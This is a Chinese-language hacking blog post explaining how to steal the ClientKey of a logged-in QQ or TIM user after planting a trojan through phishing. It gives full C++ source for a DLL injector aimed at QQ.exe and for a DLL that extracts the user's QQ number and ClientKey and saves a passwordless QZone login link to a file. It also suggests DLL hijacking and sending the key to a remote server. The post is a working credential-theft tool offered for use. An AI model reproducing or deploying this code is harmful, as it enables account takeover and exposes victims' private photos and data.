一、前言

本文主要講解如何竊取已登錄QQ或TIM用戶的ClientKey（前提是當前電腦的QQ或TIM是登錄狀態）

并悄無聲息的獲取其QQ或TIM的空間登錄權限的鏈接，然后可以在任意一臺電腦上都可以無密碼登錄其QQ空間，也可以查看其加密相冊等。

具體的實現流程后期可以優化的更完美，因為時間原因只測試了基本功能的實現。只是提供一種思路，大家可以發散思維，把流程更加簡化或自動化。

二、技術流程圖

三、具體操作

CS和MSF怎樣生成上線木馬我就不啰嗦了，大家可自行百度無論生成什么格式的木馬只要能使被攻擊者上線就可以。

參考文章：
https://www.cnblogs.com/dgjnszf/p/10877999.html（PS：如果你想讓不和你同一網段的人運行木馬上線，你的CS應部署到公網上）然后具體的文件釣魚過程我也不細說了，因為大家都有自己的釣魚方式。

下面直接就從木馬上線傳入文件后的操作開始演示：我們需要傳入的文件是一個exe一個dll

都需要傳入C盤根目錄且dll的名字必須命名為Dll1.dll(因為懶惰我都寫死到源碼中了，大家可根據源碼自行修改)。

exe的作用主要是進行遠程線程注入QQ.exe程序(因為便于測試，我寫死的是注入QQ.exe，大家如果想注入TIM的話可自行修改)。

dllInject.exe源碼

// dllInject.cpp :?此文件包含?"main"?函數。程序執行將在此處開始并結束。//#include?"pch.h"#include?<iostream>#include?<windows.h>#include?<TlHelp32.h>#include?<string.h>//這里我先寫死為C:Dll1.dll#define??DLL_PATH??L"C:Dll1.dll"?//根據進程名獲取進程ID，這里我先寫死為QQ.exeDWORD?GetProcId()?{????BOOL?bRet;????PROCESSENTRY32?pe32;????HANDLE?hSnap;????hSnap?=?CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,?NULL);????pe32.dwSize?=?sizeof(pe32);????bRet?=?Process32First(hSnap,?&pe32);????while?(bRet)????{????????if?(lstrcmp(pe32.szExeFile,L"QQ.exe")==0)????????{????????????return?pe32.th32ProcessID;????????}????????bRet?=?Process32Next(hSnap,?&pe32);????}????return?0;}????int?main(){????????????//0正常情況下，我們可以通過遍歷進程根據進程名得到進程ID????????????DWORD?dwId?=?GetProcId();????????????//1?打開目標進程，得到句柄????????????HANDLE?hProcess?=?OpenProcess(PROCESS_ALL_ACCESS,?FALSE,?dwId);????????????//2?在目標進程中申請一塊空間，能夠存放下dll文件的路徑????????????DWORD?dwSize?=?(wcslen(DLL_PATH)?+?1)?*?2;????????????LPVOID?lpAddress?=?VirtualAllocEx(hProcess,?NULL,?dwSize,?MEM_COMMIT,?PAGE_READWRITE);????????????//3?將dll文件的路徑寫入到目標進程申請的空間中????????????SIZE_T?sSize?=?0;????????????WriteProcessMemory(hProcess,?lpAddress,?DLL_PATH,?dwSize,?&sSize);????????????//4?在目標進程中，創建遠程線程使其能夠執行LoadLibrary，參數是我們寫入的dll路徑????????????HANDLE?hThread?=?CreateRemoteThread(????????????????hProcess,????????????????NULL,????????????????NULL,????????????????(LPTHREAD_START_ROUTINE)LoadLibraryW,????????????????lpAddress,????????????????NULL,????????????????NULL????????????????);????????????//5?等待線程結束，我們釋放空間????????????WaitForSingleObject(hThread,?-1);????????????VirtualFreeEx(hProcess,?lpAddress,?dwSize,?NULL);????????????//6??程序結束????????????CloseHandle(hThread);????????????CloseHandle(hProcess);}

dll的作用主要是用來竊取ClientKey并存儲到txt文件。

Dll1.dll源碼

// dllmain.cpp :?定義 DLL 應用程序的入口點。#include?"stdafx.h"#include?<stdio.h>#include<stdlib.h>#include<windows.h>#include?<WTypes.h>//定義CTXStringW為BSTRtypedef?BSTR?CTXStringW;CTXStringW?AllocTXString(const?wchar_t*?lpSrc){????if?(lpSrc?==?NULL)?return?NULL;????BYTE*?bBuffer?=?new?BYTE[16?+?(wcslen(lpSrc)?+?1)?*?2];????if?(bBuffer?==?NULL)?return?NULL;????DWORD?dwZero?=?0;????DWORD?dwCount?=?3;????DWORD?dwLenth?=?wcslen(lpSrc)?+?1;????memmove(bBuffer?+?0?*?4,?&dwZero,?4);????memmove(bBuffer?+?1?*?4,?&dwCount,?4);????memmove(bBuffer?+?2?*?4,?&dwLenth,?4);????memmove(bBuffer?+?3?*?4,?&dwLenth,?4);????wcscpy((wchar_t*)(bBuffer?+?4?*?4),?lpSrc);????return?CTXStringW(bBuffer?+?16);}VOID?Steal(){????do?{????????HMODULE?hKernelUtil?=?GetModuleHandle(L"KernelUtil.dll");????????if?(hKernelUtil?==?NULL)????????{????????????OutputDebugStringA("Get?KernelUtil?Module?failed?n");????????????break;????????}????????PVOID?PtrGetSelfUin?=?GetProcAddress(hKernelUtil,?"?GetSelfUin@Contact@Util@@YAKXZ");????????if?(PtrGetSelfUin?==?NULL)????????{????????????OutputDebugStringA("Get?GetSelfUin?Function?failed?n");????????????break;????????}????????DWORD?uin?=?((int(*)(int))PtrGetSelfUin)(1);????????if?(uin?==?NULL)????????{????????????OutputDebugStringA("Invoke?GetSelfUin?Function?failed?n");????????????break;????????}????????//?Print?QQ?number????????char?szUin[MAX_PATH]?=?{?0?};????????sprintf(szUin,?"%d",?uin);????????PVOID?GetSignature?=?GetProcAddress(hKernelUtil,?"?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");????????if?(GetSignature?==?NULL)????????{????????????OutputDebugStringA("Get?GetSignature?Function?failed?n");????????????break;????????}????????WCHAR?wsBuffer[MAX_PATH]?=?{?0?};????????CTXStringW?ClientKey?=?AllocTXString(wsBuffer);????????PVOID?res?=?((PVOID(*)(PVOID,?const?char*))GetSignature)(&ClientKey,?"buf32ByteValueAddedSignature");????????if?(res?==?NULL)????????{????????????OutputDebugStringA("Invoke?GetSignature?Function?failed?n");????????????break;????????}????????//?復制下面鏈接，無需密碼，進入QQ空間????????char?msg[MAX_PATH]?=?{?0?};????????sprintf(msg,?"https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstarn",?szUin,?ClientKey,?szUin);????????OutputDebugStringA("注入成功");????????//MessageBox(NULL,?L"提示",?L"注入成功",?MB_OK);????????FILE?*file?=?NULL;??//定義一個文件類型(FILE)的指針并初始化;?????????const?char?*FileName?=?"C:clientkey.txt";?????????file?=?fopen(FileName,?"w+");??//調用fopen函數，將返回值賦于指針file;?????????//if (!file)??//檢查文件是否打開，若打開失敗，返回一條信息后，結束程序。?????????//{????????//????OutputDebugStringA("文件打開失敗,請檢查文件是否存在!n");????????//????exit(1);????????//}??????????//需要寫入的字符串內容。?????????if?(!fputs(msg,?file))??//調用fputs函數寫入文件，不管成功或失敗都會返回一條信息。?????????OutputDebugStringA("文件寫入成功n");????????fclose(file);??//關閉文件。?????????file?=?NULL;???//放空file指針????}?while?(0);}BOOL?APIENTRY?DllMain(HMODULE?hModule,????DWORD??ul_reason_for_call,????LPVOID?lpReserved){????switch?(ul_reason_for_call)????{????case?DLL_PROCESS_ATTACH:????????Steal();????????break;????case?DLL_THREAD_ATTACH:????case?DLL_THREAD_DETACH:????case?DLL_PROCESS_DETACH:????????break;????}????return?TRUE;}

傳入文件之后我們使用命令行運行C盤根目錄中的dllInject.exe即可實現自動注入QQ.exe程序并將竊取到的ClientKey存儲到C盤根目錄，名稱為clientkey.txt

dbgView顯示注入成功，文件寫入成功。然后我們查看生成的clientkey.txt文件中的內容

復制出來在任意電腦訪問即可無密碼登錄其QQ空間查看其加密相冊的功能。

四、小結

獲取的ClientKey不會因為他QQ的下線而失效，但是會有失效時間，具體是多長時間沒有進行測試，大概是一天？

雖然這個方法的實戰作用并不大但是大家可以參考思路改進或優化方法

比如我們可以使用dll劫持直接劫持QQ程序需要加載的DLL，用戶一執行QQ就會自動加載竊取clientkey的dll，這樣就免去了使用我編寫的exe進行遠程線程注入這一步。

又或者說是改進dll，把寫入txt文件改為直接把獲取到的clientkey直接發送到遠程服務器上，這樣就省去了讀取txt文檔的步驟，小弟只是提供一下基本思路，有寫的不對的地方還請大佬們斧正。